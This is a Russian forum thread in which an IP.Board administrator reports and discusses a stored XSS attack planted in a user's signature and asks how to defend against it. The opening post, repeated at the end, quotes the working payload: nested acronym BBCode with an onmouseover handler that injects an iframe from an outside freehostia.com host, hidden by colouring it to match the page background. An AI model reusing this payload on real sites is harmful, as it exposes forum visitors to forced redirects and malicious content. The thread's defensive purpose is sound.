Опубликовано: 7 марта 201015 г Есть форум ipb один пользователь прислал в ЛС некое сообщение, при прокрутке скролом страницы перекинуло на другой сайт и вернуло обратно. В подписи юзера оказался следующий код [color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://****.freehostia.com/\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]___________________________________________________________________________[/acronym]_[/acronym][/color] вот как работает тег акронима:[acronym='Laugh Out Loud']lol[/acronym] <acronym title='{option}'>{content}</acronym> Как защититься и что делать? тема обсуждается тутhttp://ipbskins.ru/forum/topic5228.htmlhttp://forum.searchengines.ru/showthread.php?p=6476617http://forum.antichat.ru/showthread.php?p=1960546http://forums.ibresource.ru/index.php?showtopic=60138 Изменено 7 марта 201015 г пользователем fagediba
Опубликовано: 7 марта 201015 г Есть форум ipbIP.Board версия: 1.x ? Как защититься и что делать?1. Использовать не ломанную версию форума со всеми патчами безопасности. 2. Разрешить HTML в сообщениях?Если функция включена, то пользователи могут использовать HTML в личных сообщениях. Рекомендуем отключить данную функцию из соображений безопасности. 3. Разрешить HTML в подписи?Разрешение данной функции НЕ рекомендуется, если вы не полностью доверяете пользователям, которым разрешено добавлять подпись.
Опубликовано: 7 марта 201015 г Автор Атакующий скрыл подпись под цвет фонаcolor="#EEF2F7" Можно ли как-то запретить использовать в теге любые цвета? только те оставить, которые black, red и тд.? Тогда левые скрипты на странице хотя бы будут видны
Опубликовано: 7 марта 201015 г тема обсуждается тутСмысл так плодить тему.... К тому, что написал Ritsuka, добавить нечего. + жалоба в freehostia.com
Опубликовано: 7 марта 201015 г Автор > К тому, что написал Ritsuka, добавить нечего. ну запретил я акроним, запретил онмаузовер, и что, это остановит чтоли? значит используя другие теги построят свою конструкцию. Нужно чтобы грамотно кто-нибудь составил изменения в обработчик парсера
Опубликовано: 7 марта 201015 г Автор Подписи тут ни при чем. Текст можно разместить в любом месте, в посте допустим. Извиняюсь что расплодил код, сейчас его уже не убрать, я не думал что так сложно будет этому противодействовать http://forums.ibresource.ru/index.php?showtopic=60138 вон там ритсука в подписи разместила (или разместил?) - навести если табличка вылезает
Опубликовано: 7 марта 201015 г Подписи тут ни при чем. Текст можно разместить в любом месте, в посте допустим.Угу. вон там ритсука в подписи разместила (или разместил?) - навести если табличка вылезаетРазместил (ОН). Я читал молча, добавить было нечего
Опубликовано: 8 марта 201015 г Автор Официальный фикс xss с акронимом в 2.3.6 Изменения sources/classes/bbcode/class_bbcode_core.php Изменено 8 марта 201015 г пользователем Ph-A Код битый, нельзя использовать
Опубликовано: 8 марта 201015 г Официальный фикс xss с акронимом в 2.3.6Arhar на ibresource его раскритиковал. И привел другое решениеhttp://forums.ibresource.ru/index.php?s=&a...st&p=363021
Есть форум ipb
один пользователь прислал в ЛС некое сообщение, при прокрутке скролом страницы перекинуло на другой сайт и вернуло обратно. В подписи юзера оказался следующий код
[color="#EEF2F7"][acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://****.freehostia.com/\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]___________________________________________________________________________[/acronym]_[/acronym][/color]вот как работает тег акронима:
[acronym='Laugh Out Loud']lol[/acronym] <acronym title='{option}'>{content}</acronym>Как защититься и что делать?
тема обсуждается тут
http://ipbskins.ru/forum/topic5228.html
http://forum.searchengines.ru/showthread.php?p=6476617
http://forum.antichat.ru/showthread.php?p=1960546
http://forums.ibresource.ru/index.php?showtopic=60138
Изменено пользователем fagediba